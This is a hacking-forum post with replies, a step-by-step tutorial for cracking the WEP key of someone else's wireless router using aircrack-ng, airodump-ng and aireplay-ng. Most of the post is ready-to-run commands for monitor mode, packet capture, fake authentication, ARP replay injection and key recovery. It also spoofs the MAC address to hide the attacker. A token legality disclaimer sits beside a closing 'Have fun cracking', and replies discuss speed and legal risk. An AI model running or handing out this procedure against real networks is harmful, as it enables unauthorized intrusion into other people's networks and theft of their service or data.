Cracking WEP - Network Security

chroniccommand

[Intro]
WEP stands for "Wired Equivalent Privacy". It's a security algorithm for IEEE 802.11 wireless networks. Many home routers use WEP to protect other people from connecting to that network. But of course, we can crack this and get into the router. NOTE: Cracking someones router password is illegal(I think). Don't do it unless it's your own network ;)

[Getting started]
Cracking WEP keys is actually pretty easy. All you need is some tools. Install aircrack-ng.


sudo aptitude install aircrack-ng

It should install all aircrack tools like airmon and airodump etc. Also, you should install macchanger to hide yourself. Now that you have the correct tools, you can get on with the tutorial.
NOTE: BackTrack4 has all the tools you need. I'd recommend installing it and using the tools on there.

[Cracking the WEP]
Now time to actually crack the WEP key. Start with:

sudo airmon-ng

This will list your wireless devices. Mine is on wlan0.


sudo airmon-ng start &#91;interface&#93;

For me, I put wlan0 for interface. This will start monitor mode on wlan0. Now mon0 is enabled. Now we hide your MAC address.


sudo ifconfig mon0 down
sudo macchanger -m 00&#58;11&#58;22&#58;33&#58;44&#58;55 mon0
sudo ifconfig mon0 up

Now mon0's mac is 00:11:22:33:44:55
Now type:


sudo airodump-ng --encrypt wep mon0

You'll get a screen listing BSSID, ESSID, Data#, Encryption type etc.
Now wait a sec and you'll get the available networks for cracking. Exit that screen with ctrl-C to go back to the terminal.
Now to filter networks.


sudo airodump-ng --bssid &#91;bssid&#93; -c &#91;channel&#93; -w &#91;Filename&#93; mon0

For bssid, input the bssid of the network you wish to crack.
For example:

sudo airodump-ng --bssid 01&#58;AF&#58;C7&#58;A4&#58;14&#58;8F  -c 1 -w esponet mon0

Now we must collect data so we can crack it with aircrack-ng.


sudo aireplay-ng -1 0 -a &#91;bssid&#93; -h &#91;mon0 mac&#93; -e &#91;essid&#93; mon0

For mon0 mac, input 00:11:22:33:44:55 (Or whatever you changed mon0's mac to).
Now we need to collect more data. Type:


sudo aireplay-ng -3 -b &#91;bssid&#93; -h &#91;mon0 mac&#93; mon0

Now go to your airodump tab and the #DATA tab should be rising more rapidly.

Now to actually crack the captured data.


sudo aircrack-ng filename&#46;cap

Change filename.cap to something like [esponet.cap] or whatever the network you wish to crack's name is. You should get a window showing keys. Leave that alone and let aircrack do its thing. Once it's done the key will show up. For example:


KEY FOUND! &#91; 12&#58;34&#58;56&#58;78 &#93;

The key would be 12345678

Have fun cracking.

--Chroniccommand

undead

Nice guide chronic. Keep making those great guides.

alix10

Exactly how long does this take on backtrack?

Sh3llc0d3

said:

Exactly how long does this take on backtrack?

Fuck all time at all.

Guide could possibly use more indepth description on the commands...

Associates the router with your attacking machine by sending packets

sudo aireplay-ng -1 0 -a [bssid] -h [mon0 mac] -e [essid] mon0

I believe the below command re-authenticates the router with your machine

sudo aireplay-ng -3 -b [bssid] -h [mon0 mac] mon0

And clarification on the legal standpoint, depending on your country and their laws on it it depends. Most countries are covered for you intrusion into someone elses network. At the very least you are committing theft by stealing bandwidth the person has paid for. How deep the shit your in depends on what you do while on the network. Sniffing and penetrating further can get very serious depending on the network you've penetrated.

Another quick note for backtrack users, you don't need to include 'sudo' as backtrack runs natively with root privs.

Xin

Takes probably 10minutes, less if your fast i would say. Great Guide Chronic

Sh3llc0d3

Yeah, the speed of cracking wep is only limited really by your network card and typing speed.

volvo14

it is a poor Documentation !!!
i will participate later with full tutorials
from vivek :)

Howdy, Stranger!

Top Posters

Who's Online (2)